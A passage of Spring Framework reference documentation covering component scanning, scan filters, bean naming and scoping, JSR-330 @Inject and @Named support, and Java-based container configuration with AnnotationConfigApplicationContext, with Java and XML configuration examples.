from\nmeta-annotations to allow user customization. This can be particularly useful when you\nwant to only expose a subset of the meta-annotation's attributes. For example, Spring's\n`@SessionScope` annotation hardcodes the scope name to `session` but still allows\ncustomization of the `proxyMode`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Target({ElementType.TYPE, ElementType.METHOD})\n\t@Retention(RetentionPolicy.RUNTIME)\n\t@Documented\n\t@Scope(WebApplicationContext.SCOPE_SESSION)\n\tpublic @interface SessionScope {\n\n\t\t\/**\n\t\t * Alias for {@link Scope#proxyMode}.\n\t\t * <p>Defaults to {@link ScopedProxyMode#TARGET_CLASS}.\n\t\t *\/\n\t\t@AliasFor(annotation = Scope.class)\n\t\tScopedProxyMode proxyMode() default ScopedProxyMode.TARGET_CLASS;\n\n\t}\n----\n\n`@SessionScope` can then be used without declaring the `proxyMode` as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Service\n\t**@SessionScope**\n\tpublic class SessionScopedService {\n\t\t\/\/ ...\n\t}\n----\n\nOr with an overridden value for the `proxyMode` as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Service\n\t**@SessionScope(proxyMode = ScopedProxyMode.INTERFACES)**\n\tpublic class SessionScopedUserService implements UserService {\n\t\t\/\/ ...\n\t}\n----\n\nFor further details, consult the <<annotation-programming-model,Spring Annotation Programming Model>>.\n\n\n[[beans-scanning-autodetection]]\n=== Automatically detecting classes and registering bean definitions\n\nSpring can automatically detect stereotyped classes and register corresponding\n``BeanDefinition``s with the `ApplicationContext`. For example, the following two classes\nare eligible for such autodetection:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Service\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t@Autowired\n\t\tpublic SimpleMovieLister(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Repository\n\tpublic class JpaMovieFinder implements MovieFinder {\n\t\t\/\/ implementation elided for clarity\n\t}\n----\n\nTo autodetect these classes and register the corresponding beans, you need to add\n`@ComponentScan` to your `@Configuration` class, where the `basePackages` attribute\nis a common parent package for the two classes. (Alternatively, you can specify a\ncomma\/semicolon\/space-separated list that includes the parent package of each class.)\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@ComponentScan(basePackages = \"org.example\")\n\tpublic class AppConfig {\n \t...\n\t}\n----\n\n[NOTE]\n====\nfor concision, the above may have used the `value` attribute of the\nannotation, i.e. `@ComponentScan(\"org.example\")`\n====\n\nThe following is an alternative using XML\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:context=\"http:\/\/www.springframework.org\/schema\/context\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\/spring-context.xsd\">\n\n\t\t<context:component-scan base-package=\"org.example\"\/>\n\n\t<\/beans>\n----\n\n[TIP]\n====\n\nThe use of `<context:component-scan>` implicitly enables the functionality of\n`<context:annotation-config>`. There is usually no need to include the\n`<context:annotation-config>` element when using `<context:component-scan>`.\n====\n\n[NOTE]\n====\nThe scanning of classpath packages requires the presence of corresponding directory\nentries in the classpath. When you build JARs with Ant, make sure that you do __not__\nactivate the files-only switch of the JAR task. Also, classpath directories may not\nget exposed based on security policies in some environments, e.g. standalone apps on\nJDK 1.7.0_45 and higher (which requires 'Trusted-Library' setup in your manifests; see\nhttp:\/\/stackoverflow.com\/questions\/19394570\/java-jre-7u45-breaks-classloader-getresources).\n====\n\nFurthermore, the `AutowiredAnnotationBeanPostProcessor` and\n`CommonAnnotationBeanPostProcessor` are both included implicitly when you use the\ncomponent-scan element. That means that the two components are autodetected __and__\nwired together - all without any bean configuration metadata provided in XML.\n\n[NOTE]\n====\nYou can disable the registration of `AutowiredAnnotationBeanPostProcessor` and\n`CommonAnnotationBeanPostProcessor` by including the __annotation-config__ attribute\nwith a value of false.\n====\n\n\n\n[[beans-scanning-filters]]\n=== Using filters to customize scanning\n\nBy default, classes annotated with `@Component`, `@Repository`, `@Service`,\n`@Controller`, or a custom annotation that itself is annotated with `@Component` are the\nonly detected candidate components. However, you can modify and extend this behavior\nsimply by applying custom filters. Add them as __includeFilters__ or __excludeFilters__\nparameters of the `@ComponentScan` annotation (or as __include-filter__ or __exclude-filter__\nsub-elements of the `component-scan` element). Each filter element requires the `type`\nand `expression` attributes. The following table describes the filtering options.\n\n[[beans-scanning-filters-tbl]]\n.Filter Types\n|===\n| Filter Type| Example Expression| Description\n\n| annotation (default)\n| `org.example.SomeAnnotation`\n| An annotation to be present at the type level in target components.\n\n| assignable\n| `org.example.SomeClass`\n| A class (or interface) that the target components are assignable to (extend\/implement).\n\n| aspectj\n| `org.example..*Service+`\n| An AspectJ type expression to be matched by the target components.\n\n| regex\n| `org\\.example\\.Default.*`\n| A regex expression to be matched by the target components class names.\n\n| custom\n| `org.example.MyTypeFilter`\n| A custom implementation of the `org.springframework.core.type .TypeFilter` interface.\n|===\n\nThe following example shows the configuration ignoring all `@Repository` annotations\nand using \"stub\" repositories instead.\n\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n @ComponentScan(basePackages = \"org.example\",\n \t\tincludeFilters = @Filter(type = FilterType.REGEX, pattern = \".*Stub.*Repository\"),\n \t\texcludeFilters = @Filter(Repository.class))\n public class AppConfig {\n \t...\n }\n----\n\nand the equivalent using XML\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<context:component-scan base-package=\"org.example\">\n\t\t\t<context:include-filter type=\"regex\"\n\t\t\t\t\texpression=\".*Stub.*Repository\"\/>\n\t\t\t<context:exclude-filter type=\"annotation\"\n\t\t\t\t\texpression=\"org.springframework.stereotype.Repository\"\/>\n\t\t<\/context:component-scan>\n\t<\/beans>\n----\n\n[NOTE]\n====\nYou can also disable the default filters by setting `useDefaultFilters=false` on the annotation or\nproviding `use-default-filters=\"false\"` as an attribute of the `<component-scan\/>` element. This\nwill in effect disable automatic detection of classes annotated with `@Component`, `@Repository`,\n`@Service`, `@Controller`, or `@Configuration`.\n====\n\n\n\n[[beans-factorybeans-annotations]]\n=== Defining bean metadata within components\n\nSpring components can also contribute bean definition metadata to the container. You do\nthis with the same `@Bean` annotation used to define bean metadata within `@Configuration`\nannotated classes. Here is a simple example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Component\n\tpublic class FactoryMethodComponent {\n\n\t\t@Bean\n\t\t@Qualifier(\"public\")\n\t\tpublic TestBean publicInstance() {\n\t\t\treturn new TestBean(\"publicInstance\");\n\t\t}\n\n\t\tpublic void doWork() {\n\t\t\t\/\/ Component method implementation omitted\n\t\t}\n\n\t}\n----\n\nThis class is a Spring component that has application-specific code contained in its\n`doWork()` method. However, it also contributes a bean definition that has a factory\nmethod referring to the method `publicInstance()`. The `@Bean` annotation identifies the\nfactory method and other bean definition properties, such as a qualifier value through\nthe `@Qualifier` annotation. Other method level annotations that can be specified are\n`@Scope`, `@Lazy`, and custom qualifier annotations.\n\n[TIP]\n====\nIn addition to its role for component initialization, the `@Lazy` annotation may also be\nplaced on injection points marked with `@Autowired` or `@Inject`. In this context, it\nleads to the injection of a lazy-resolution proxy.\n====\n\nAutowired fields and methods are supported as previously discussed, with additional\nsupport for autowiring of `@Bean` methods:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Component\n\tpublic class FactoryMethodComponent {\n\n\t\tprivate static int i;\n\n\t\t@Bean\n\t\t@Qualifier(\"public\")\n\t\tpublic TestBean publicInstance() {\n\t\t\treturn new TestBean(\"publicInstance\");\n\t\t}\n\n\t\t\/\/ use of a custom qualifier and autowiring of method parameters\n\n\t\t@Bean\n\t\tprotected TestBean protectedInstance(\n\t\t\t\t@Qualifier(\"public\") TestBean spouse,\n\t\t\t\t@Value(\"#{privateInstance.age}\") String country) {\n\t\t\tTestBean tb = new TestBean(\"protectedInstance\", 1);\n\t\t\ttb.setSpouse(spouse);\n\t\t\ttb.setCountry(country);\n\t\t\treturn tb;\n\t\t}\n\n\t\t@Bean\n\t\tprivate TestBean privateInstance() {\n\t\t\treturn new TestBean(\"privateInstance\", i++);\n\t\t}\n\n\t\t@Bean\n\t\t@RequestScope\n\t\tpublic TestBean requestScopedInstance() {\n\t\t\treturn new TestBean(\"requestScopedInstance\", 3);\n\t\t}\n\n\t}\n----\n\nThe example autowires the `String` method parameter `country` to the value of the `Age`\nproperty on another bean named `privateInstance`. A Spring Expression Language element\ndefines the value of the property through the notation `#{ <expression> }`. For `@Value`\nannotations, an expression resolver is preconfigured to look for bean names when\nresolving expression text.\n\nThe `@Bean` methods in a Spring component are processed differently than their\ncounterparts inside a Spring `@Configuration` class. The difference is that `@Component`\nclasses are not enhanced with CGLIB to intercept the invocation of methods and fields.\nCGLIB proxying is the means by which invoking methods or fields within `@Bean` methods\nin `@Configuration` classes creates bean metadata references to collaborating objects;\nsuch methods are __not__ invoked with normal Java semantics but rather go through the\ncontainer in order to provide the usual lifecycle management and proxying of Spring\nbeans even when referring to other beans via programmatic calls to `@Bean` methods.\nIn contrast, invoking a method or field in an `@Bean` method within a plain `@Component`\nclass __has__ standard Java semantics, with no special CGLIB processing or other\nconstraints applying.\n\n[NOTE]\n====\nYou may declare `@Bean` methods as `static`, allowing for them to be called without\ncreating their containing configuration class as an instance. This makes particular\nsense when defining post-processor beans, e.g. of type `BeanFactoryPostProcessor` or\n`BeanPostProcessor`, since such beans will get initialized early in the container\nlifecycle and should avoid triggering other parts of the configuration at that point.\n\nNote that calls to static `@Bean` methods will never get intercepted by the container,\nnot even within `@Configuration` classes (see above). This is due to technical\nlimitations: CGLIB subclassing can only override non-static methods. As a consequence,\na direct call to another `@Bean` method will have standard Java semantics, resulting\nin an independent instance being returned straight from the factory method itself.\n\nThe Java language visibility of `@Bean` methods does not have an immediate impact on\nthe resulting bean definition in Spring's container. You may freely declare your\nfactory methods as you see fit in non-`@Configuration` classes and also for static\nmethods anywhere. However, regular `@Bean` methods in `@Configuration` classes need\nto be overridable, i.e. they must not be declared as `private` or `final`.\n\n`@Bean` methods will also be discovered on base classes of a given component or\nconfiguration class, as well as on Java 8 default methods declared in interfaces\nimplemented by the component or configuration class. This allows for a lot of\nflexibility in composing complex configuration arrangements, with even multiple\ninheritance being possible through Java 8 default methods as of Spring 4.2.\n\nFinally, note that a single class may hold multiple `@Bean` methods for the same\nbean, as an arrangement of multiple factory methods to use depending on available\ndependencies at runtime. This is the same algorithm as for choosing the \"greediest\"\nconstructor or factory method in other configuration scenarios: The variant with\nthe largest number of satisfiable dependencies will be picked at construction time,\nanalogous to how the container selects between multiple `@Autowired` constructors.\n====\n\n\n\n[[beans-scanning-name-generator]]\n=== Naming autodetected components\n\nWhen a component is autodetected as part of the scanning process, its bean name is\ngenerated by the `BeanNameGenerator` strategy known to that scanner. By default, any\nSpring stereotype annotation (`@Component`, `@Repository`, `@Service`, and\n`@Controller`) that contains a _name_ `value` will thereby provide that name to the\ncorresponding bean definition.\n\nIf such an annotation contains no _name_ `value` or for any other detected component (such\nas those discovered by custom filters), the default bean name generator returns the\nuncapitalized non-qualified class name. For example, if the following two components\nwere detected, the names would be `myMovieLister` and `movieFinderImpl`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Service(\"myMovieLister\")\n\tpublic class SimpleMovieLister {\n\t\t\/\/ ...\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Repository\n\tpublic class MovieFinderImpl implements MovieFinder {\n\t\t\/\/ ...\n\t}\n----\n\n[NOTE]\n====\nIf you do not want to rely on the default bean-naming strategy, you can provide a custom\nbean-naming strategy. First, implement the\n{api-spring-framework}\/beans\/factory\/support\/BeanNameGenerator.html[`BeanNameGenerator`]\ninterface, and be sure to include a default no-arg constructor. Then, provide the\nfully-qualified class name when configuring the scanner:\n====\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n @ComponentScan(basePackages = \"org.example\", nameGenerator = MyNameGenerator.class)\n public class AppConfig {\n \t...\n }\n----\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<context:component-scan base-package=\"org.example\"\n\t\t\tname-generator=\"org.example.MyNameGenerator\" \/>\n\t<\/beans>\n----\n\nAs a general rule, consider specifying the name with the annotation whenever other\ncomponents may be making explicit references to it. On the other hand, the\nauto-generated names are adequate whenever the container is responsible for wiring.\n\n\n\n[[beans-scanning-scope-resolver]]\n=== Providing a scope for autodetected components\n\nAs with Spring-managed components in general, the default and most common scope for\nautodetected components is `singleton`. However, sometimes you need a different scope\nwhich can be specified via the `@Scope` annotation. Simply provide the name of the scope\nwithin the annotation:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Scope(\"prototype\")\n\t@Repository\n\tpublic class MovieFinderImpl implements MovieFinder {\n\t\t\/\/ ...\n\t}\n----\n\nFor details on web-specific scopes, see <<beans-factory-scopes-other>>.\n\n\n[NOTE]\n====\nTo provide a custom strategy for scope resolution rather than relying on the\nannotation-based approach, implement the\n{api-spring-framework}\/context\/annotation\/ScopeMetadataResolver.html[`ScopeMetadataResolver`]\ninterface, and be sure to include a default no-arg constructor. Then, provide the\nfully-qualified class name when configuring the scanner:\n====\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@ComponentScan(basePackages = \"org.example\", scopeResolver = MyScopeResolver.class)\n\tpublic class AppConfig {\n \t...\n }\n----\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<context:component-scan base-package=\"org.example\"\n\t\t\t\tscope-resolver=\"org.example.MyScopeResolver\" \/>\n\t<\/beans>\n----\n\nWhen using certain non-singleton scopes, it may be necessary to generate proxies for the\nscoped objects. The reasoning is described in <<beans-factory-scopes-other-injection>>.\nFor this purpose, a __scoped-proxy__ attribute is available on the component-scan\nelement. The three possible values are: no, interfaces, and targetClass. For example,\nthe following configuration will result in standard JDK dynamic proxies:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@ComponentScan(basePackages = \"org.example\", scopedProxy = ScopedProxyMode.INTERFACES)\n\tpublic class AppConfig {\n \t...\n }\n----\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<context:component-scan base-package=\"org.example\"\n\t\t\tscoped-proxy=\"interfaces\" \/>\n\t<\/beans>\n----\n\n\n\n[[beans-scanning-qualifiers]]\n=== Providing qualifier metadata with annotations\n\nThe `@Qualifier` annotation is discussed in <<beans-autowired-annotation-qualifiers>>.\nThe examples in that section demonstrate the use of the `@Qualifier` annotation and\ncustom qualifier annotations to provide fine-grained control when you resolve autowire\ncandidates. Because those examples were based on XML bean definitions, the qualifier\nmetadata was provided on the candidate bean definitions using the `qualifier` or `meta`\nsub-elements of the `bean` element in the XML. When relying upon classpath scanning for\nautodetection of components, you provide the qualifier metadata with type-level\nannotations on the candidate class. The following three examples demonstrate this\ntechnique:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Component\n\t**@Qualifier(\"Action\")**\n\tpublic class ActionMovieCatalog implements MovieCatalog {\n\t\t\/\/ ...\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Component\n\t**@Genre(\"Action\")**\n\tpublic class ActionMovieCatalog implements MovieCatalog {\n\t\t\/\/ ...\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Component\n\t**@Offline**\n\tpublic class CachingMovieCatalog implements MovieCatalog {\n\t\t\/\/ ...\n\t}\n----\n\n[NOTE]\n====\nAs with most annotation-based alternatives, keep in mind that the annotation metadata is\nbound to the class definition itself, while the use of XML allows for multiple beans\n__of the same type__ to provide variations in their qualifier metadata, because that\nmetadata is provided per-instance rather than per-class.\n====\n\n\n\n\n[[beans-standard-annotations]]\n== Using JSR 330 Standard Annotations\nStarting with Spring 3.0, Spring offers support for JSR-330 standard annotations\n(Dependency Injection). Those annotations are scanned in the same way as the Spring\nannotations. You just need to have the relevant jars in your classpath.\n\n[NOTE]\n====\nIf you are using Maven, the `javax.inject` artifact is available in the standard Maven\nrepository (\nhttp:\/\/repo1.maven.org\/maven2\/javax\/inject\/javax.inject\/1\/[http:\/\/repo1.maven.org\/maven2\/javax\/inject\/javax.inject\/1\/]).\nYou can add the following dependency to your file pom.xml:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<dependency>\n\t\t<groupId>javax.inject<\/groupId>\n\t\t<artifactId>javax.inject<\/artifactId>\n\t\t<version>1<\/version>\n\t<\/dependency>\n----\n====\n\n\n\n[[beans-inject-named]]\n=== Dependency Injection with @Inject and @Named\n\nInstead of `@Autowired`, `@javax.inject.Inject` may be used as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport javax.inject.Inject;\n\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t@Inject\n\t\tpublic void setMovieFinder(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t\tpublic void listMovies() {\n\t\t\tthis.movieFinder.findMovies(...);\n\t\t\t...\n\t\t}\n\t}\n----\n\nAs with `@Autowired`, it is possible to use `@Inject` at the field level, method level\nand constructor-argument level. Furthermore, you may declare your injection point as a\n`Provider`, allowing for on-demand access to beans of shorter scopes or lazy access to\nother beans through a `Provider.get()` call. As a variant of the example above:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport javax.inject.Inject;\n\timport javax.inject.Provider;\n\n\tpublic class SimpleMovieLister {\n\n\t\tprivate Provider<MovieFinder> movieFinder;\n\n\t\t@Inject\n\t\tpublic void setMovieFinder(Provider<MovieFinder> movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t\tpublic void listMovies() {\n\t\t\tthis.movieFinder.get().findMovies(...);\n\t\t\t...\n\t\t}\n\t}\n----\n\nIf you would like to use a qualified name for the dependency that should be injected,\nyou should use the `@Named` annotation as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport javax.inject.Inject;\n\timport javax.inject.Named;\n\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t@Inject\n\t\tpublic void setMovieFinder(@Named(\"main\") MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t\t\/\/ ...\n\t}\n----\n\n\n\n[[beans-named]]\n=== @Named and @ManagedBean: standard equivalents to the @Component annotation\n\nInstead of `@Component`, `@javax.inject.Named` or `javax.annotation.ManagedBean` may be\nused as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport javax.inject.Inject;\n\timport javax.inject.Named;\n\n\t@Named(\"movieListener\") \/\/ @ManagedBean(\"movieListener\") could be used as well\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t@Inject\n\t\tpublic void setMovieFinder(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t\t\/\/ ...\n\t}\n----\n\nIt is very common to use `@Component` without specifying a name for the component.\n`@Named` can be used in a similar fashion:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport javax.inject.Inject;\n\timport javax.inject.Named;\n\n\t@Named\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t@Inject\n\t\tpublic void setMovieFinder(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t\t\/\/ ...\n\t}\n----\n\nWhen using `@Named` or `@ManagedBean`, it is possible to use component scanning in the\nexact same way as when using Spring annotations:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@ComponentScan(basePackages = \"org.example\")\n\tpublic class AppConfig {\n \t...\n\t}\n----\n\n[NOTE]\n====\nIn contrast to `@Component`, the JSR-330 `@Named` and the JSR-250 `ManagedBean`\nannotations are not composable. Please use Spring's stereotype model for building custom\ncomponent annotations.\n====\n\n\n\n[[beans-standard-annotations-limitations]]\n=== Limitations of JSR-330 standard annotations\n\nWhen working with standard annotations, it is important to know that some significant\nfeatures are not available as shown in the table below:\n\n[[annotations-comparison]]\n.Spring component model elements vs. JSR-330 variants\n|===\n| Spring| javax.inject.*| javax.inject restrictions \/ comments\n\n| @Autowired\n| @Inject\n| `@Inject` has no 'required' attribute; can be used with Java 8's `Optional` instead.\n\n| @Component\n| @Named \/ @ManagedBean\n| JSR-330 does not provide a composable model, just a way to identify named components.\n\n| @Scope(\"singleton\")\n| @Singleton\n| The JSR-330 default scope is like Spring's `prototype`. However, in order to keep it\n consistent with Spring's general defaults, a JSR-330 bean declared in the Spring\n container is a `singleton` by default. In order to use a scope other than `singleton`,\n you should use Spring's `@Scope` annotation. `javax.inject` also provides a\n http:\/\/download.oracle.com\/javaee\/6\/api\/javax\/inject\/Scope.html[@Scope] annotation.\n Nevertheless, this one is only intended to be used for creating your own annotations.\n\n| @Qualifier\n| @Qualifier \/ @Named\n| `javax.inject.Qualifier` is just a meta-annotation for building custom qualifiers.\n Concrete String qualifiers (like Spring's `@Qualifier` with a value) can be associated\n through `javax.inject.Named`.\n\n| @Value\n| -\n| no equivalent\n\n| @Required\n| -\n| no equivalent\n\n| @Lazy\n| -\n| no equivalent\n\n| ObjectFactory\n| Provider\n| `javax.inject.Provider` is a direct alternative to Spring's `ObjectFactory`,\n just with a shorter `get()` method name. It can also be used in combination with\n Spring's `@Autowired` or with non-annotated constructors and setter methods.\n|===\n\n\n\n\n[[beans-java]]\n== Java-based container configuration\n\n\n\n[[beans-java-basic-concepts]]\n=== Basic concepts: @Bean and @Configuration\n\nThe central artifacts in Spring's new Java-configuration support are\n`@Configuration`-annotated classes and `@Bean`-annotated methods.\n\nThe `@Bean` annotation is used to indicate that a method instantiates, configures and\ninitializes a new object to be managed by the Spring IoC container. For those familiar\nwith Spring's `<beans\/>` XML configuration the `@Bean` annotation plays the same role as\nthe `<bean\/>` element. You can use `@Bean` annotated methods with any Spring\n`@Component`, however, they are most often used with `@Configuration` beans.\n\nAnnotating a class with `@Configuration` indicates that its primary purpose is as a\nsource of bean definitions. Furthermore, `@Configuration` classes allow inter-bean\ndependencies to be defined by simply calling other `@Bean` methods in the same class.\nThe simplest possible `@Configuration` class would read as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean\n\t\tpublic MyService myService() {\n\t\t\treturn new MyServiceImpl();\n\t\t}\n\n\t}\n----\n\nThe `AppConfig` class above would be equivalent to the following Spring `<beans\/>` XML:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<bean id=\"myService\" class=\"com.acme.services.MyServiceImpl\"\/>\n\t<\/beans>\n----\n\n.Full @Configuration vs 'lite' @Beans mode?\n****\nWhen `@Bean` methods are declared within classes that are __not__ annotated with\n`@Configuration` they are referred to as being processed in a 'lite' mode. For example,\nbean methods declared in a `@Component` or even in a __plain old class__ will be\nconsidered 'lite'.\n\nUnlike full `@Configuration`, lite `@Bean` methods cannot easily declare inter-bean\ndependencies. Usually one `@Bean` method should not invoke another `@Bean` method when\noperating in 'lite' mode.\n\nOnly using `@Bean` methods within `@Configuration` classes is a recommended approach of\nensuring that 'full' mode is always used. This will prevent the same `@Bean` method from\naccidentally being invoked multiple times and helps to reduce subtle bugs that can be\nhard to track down when operating in 'lite' mode.\n****\n\nThe `@Bean` and `@Configuration` annotations will be discussed in depth in the sections\nbelow. First, however, we'll cover the various ways of creating a spring container using\nJava-based configuration.\n\n[[beans-java-instantiating-container]]\n=== Instantiating the Spring container using AnnotationConfigApplicationContext\n\nThe sections below document Spring's `AnnotationConfigApplicationContext`, new in Spring\n3.0. This versatile `ApplicationContext` implementation is capable of accepting not only\n`@Configuration` classes as input, but also plain `@Component` classes and classes\nannotated with JSR-330 metadata.\n\nWhen `@Configuration` classes are provided as input, the `@Configuration` class itself\nis registered as a bean definition, and all declared `@Bean` methods within the class\nare also registered as bean definitions.\n\nWhen `@Component` and JSR-330 classes are provided, they are registered as bean\ndefinitions, and it is assumed that DI metadata such as `@Autowired` or `@Inject` are\nused within those classes where necessary.\n\n\n[[beans-java-instantiating-container-contstructor]]\n==== Simple construction\n\nIn much the same way that Spring XML files are used as input when instantiating a\n`ClassPathXmlApplicationContext`, `@Configuration` classes may be used as input when\ninstantiating an `AnnotationConfigApplicationContext`. This allows for completely\nXML-free usage of the Spring container:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tApplicationContext ctx = new AnnotationConfigApplicationContext(AppConfig.class);\n\t\tMyService myService = ctx.getBean(MyService.class);\n\t\tmyService.doStuff();\n\t}\n----\n\nAs mentioned above, `AnnotationConfigApplicationContext` is not limited to working only\nwith `@Configuration` classes. Any `@Component` or JSR-330 annotated class may be supplied\nas input to the constructor. For example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tApplicationContext ctx = new AnnotationConfigApplicationContext(MyServiceImpl.class, Dependency1.class, Dependency2.class);\n\t\tMyService myService = ctx.getBean(MyService.class);\n\t\tmyService.doStuff();\n\t}\n----\n\nThe above assumes that `MyServiceImpl`, `Dependency1` and `Dependency2` use Spring\ndependency injection annotations such as `@Autowired`.\n\n\n[[beans-java-instantiating-container-register]]\n==== Building the container programmatically using register(Class<?>...)\n\nAn `AnnotationConfigApplicationContext` may be instantiated using a no-arg constructor\nand then configured using the `register()` method. This approach is particularly useful\nwhen programmatically building an `AnnotationConfigApplicationContext`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tAnnotationConfigApplicationContext ctx = new AnnotationConfigApplicationContext();\n\t\tctx.register(AppConfig.class, OtherConfig.class);\n\t\tctx.register(AdditionalConfig.class);\n\t\tctx.refresh();\n\t\tMyService myService = ctx.getBean(MyService.class);\n\t\tmyService.doStuff();\n\t}\n----\n\n\n[[beans-java-instantiating-container-scan]]\n==== Enabling component scanning with scan(String...)\n\nTo enable component scanning, just annotate your `@Configuration` class as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@ComponentScan(basePackages = \"com.acme\")\n\tpublic class AppConfig {\n \t...\n\t}\n----\n\n[TIP]\n====\n\nExperienced Spring users will be familiar with the XML declaration equivalent from\nSpring's `context:` namespace\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<context:component-scan base-package=\"com.acme\"\/>\n\t<\/beans>\n----\n====\n\n\nIn the example above, the `com.acme` package will be scanned, looking for any\n`@Component`-annotated classes, and those classes will be registered as Spring bean\ndefinitions within the container. `AnnotationConfigApplicationContext` exposes the\n`scan(String...)` method to allow for the same component-scanning functionality:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tAnnotationConfigApplicationContext ctx = new AnnotationConfigApplicationContext();\n\t\tctx.scan(\"com.acme\");\n\t\tctx.refresh();\n\t\tMyService myService = ctx.getBean(MyService.class);\n\t}\n----\n\n[NOTE]\n====\nRemember that `@Configuration` classes are <<beans-meta-annotations,meta-annotated>>\nwith `@Component`, so they are candidates for component-scanning! In the example above,\nassuming that `AppConfig` is declared within the `com.acme` package (or any package\nunderneath), it will be picked up during the call to `scan()`, and upon `refresh()` all\nits `@Bean` methods will be processed and registered as bean definitions within the\ncontainer.\n====\n\n\n[[beans-java-instantiating-container-web]]\n==== Support for web applications with AnnotationConfigWebApplicationContext\n\nA `WebApplicationContext` variant of `AnnotationConfigApplicationContext` is available\nwith `AnnotationConfigWebApplicationContext`. This implementation may be used when\nconfiguring the Spring `ContextLoaderListener` servlet listener, Spring MVC\n`DispatcherServlet`, etc. What follows is a `web.xml` snippet that configures a typical\nSpring MVC web application. Note the use of the `contextClass` context-param and\ninit-param:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<web-app>\n\t\t<!-- Configure ContextLoaderListener to use AnnotationConfigWebApplicationContext\n\t\t\tinstead of the default XmlWebApplicationContext -->\n\t\t<context-param>\n\t\t\t<param-name>contextClass<\/param-name>\n\t\t\t<param-value>\n\t\t\t\torg.springframework.web.context.support.AnnotationConfigWebApplicationContext\n\t\t\t<\/param-value>\n\t\t<\/context-param>\n\n\t\t<!-- Configuration locations must consist of one or more comma- or space-delimited\n\t\t\tfully-qualified @Configuration classes. Fully-qualified packages may also be\n\t\t\tspecified for component-scanning 